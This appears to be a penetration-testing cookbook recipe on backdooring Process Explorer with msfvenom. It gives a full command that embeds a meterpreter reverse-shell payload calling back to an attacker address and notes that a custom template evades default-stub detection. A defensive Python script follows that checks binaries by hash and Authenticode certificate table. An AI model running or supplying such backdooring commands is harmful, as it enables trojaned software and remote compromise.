Backdooring known applications can be a good way to compromise a target, for example, when you are already on the internal network and have gained access to the internal software repository. In addition, by using a custom template you may be able to bypass security solutions that detect Metasploit payloads by fingerprinting the default template.
MSFvenom, by default, uses the templates in the /usr/share/metasploit-framework/data/templates directory, but we can choose to use our own with the -x option.
- Using the -x option, we can specify our own template; in this recipe we will use Process Explorer from Windows Sysinternals. By adding the -k option, the original program keeps running and our payload is executed as a new thread inside the template:
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.216.5 -x procexp.exe -k -f exe -o procexp-backdoored.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
...
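Because a custom template defeats detections keyed on the default MSFvenom stub, the defender-side control is software integrity: compare each binary in the internal repository against the vendor-published hash and check whether it still carries an Authenticode certificate table (a patched PE normally loses or invalidates it). The following script is an added example, not part of the recipe or of Metasploit; the two PE images it inspects are constructed headers-only stand-ins for an original and a tampered Process Explorer, and the hash it treats as "known good" is the hash of the constructed original, not a real Sysinternals checksum.

```python
import hashlib
import struct

def build_pe(cert_size: int, pe32plus: bool = False) -> bytes:
    """Constructed minimal PE (headers only, not executable) used as sample input.
    cert_size > 0 fills data directory entry 4 (IMAGE_DIRECTORY_ENTRY_SECURITY)."""
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    dd_offset = 112 if pe32plus else 96          # data directories start here in the optional header
    opt_size = dd_offset + 16 * 8
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, opt_size, 0)  # SizeOfOptionalHeader = opt_size
    opt = struct.pack("<H", 0x20B if pe32plus else 0x10B) + b"\x00" * (dd_offset - 2)
    dirs = [(0, 0)] * 16
    dirs[4] = (0x1000, cert_size)                # (file offset, size) of the certificate table
    opt += b"".join(struct.pack("<II", va, sz) for va, sz in dirs)
    return dos + b"PE\x00\x00" + coff + opt

def security_directory(data: bytes):
    """Return (offset, size) of the Attribute Certificate Table, or None when the
    input is not a PE or its optional header is too short to hold entry 4."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    opt = e_lfanew + 4 + 20                      # optional header follows the 20-byte COFF header
    opt_size = struct.unpack_from("<H", data, e_lfanew + 4 + 16)[0]
    if len(data) < opt + opt_size or opt_size < 2:
        return None
    magic = struct.unpack_from("<H", data, opt)[0]
    entry = opt + (112 if magic == 0x20B else 96) + 4 * 8
    if entry + 8 > opt + opt_size:
        return None
    return struct.unpack_from("<II", data, entry)

def assess(data: bytes, known_good_sha256: str) -> dict:
    """Integrity verdict for a repository binary. A present certificate table is
    only a hint; the signature itself must still be validated with the platform
    tooling (e.g. signtool or Get-AuthenticodeSignature) before trusting it."""
    sec = security_directory(data)
    return {
        "sha256_matches": hashlib.sha256(data).hexdigest() == known_good_sha256,
        "has_cert_table": sec is not None and sec[1] > 0,
    }

# Constructed samples: "original" carries a certificate table, "tampered" does not.
ORIGINAL = build_pe(0x2000)
TAMPERED = build_pe(0)
KNOWN_GOOD = hashlib.sha256(ORIGINAL).hexdigest()   # stand-in for the vendor-published hash
```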